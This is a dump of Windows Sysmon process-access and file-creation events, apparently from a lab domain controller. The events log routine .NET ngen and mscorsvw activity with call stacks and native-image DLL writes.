13:47:34.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-8D02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.093{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-8D02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-8D02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:34.031{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\324-0\System.Messaging.dll2021-01-18 13:47:34.031 10341000x80000000000000006771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.499{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.499{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:35.499{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.030{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9177-6005-9302-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9177-6005-9302-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:35.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9177-6005-9302-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.827{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:36.827{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.780{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9702-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.780{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9702-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.780{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9702-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:36.718{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11c8-0\System.Reflection.Context.dll2021-01-18 13:47:36.718 10341000x80000000000000006778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.546{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:36.546{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.530{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9502-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.515{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9502-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.515{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9502-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:36.421{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f80-0\System.Printing.dll2021-01-18 13:47:36.421 10341000x80000000000000006806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.890{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:37.890{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 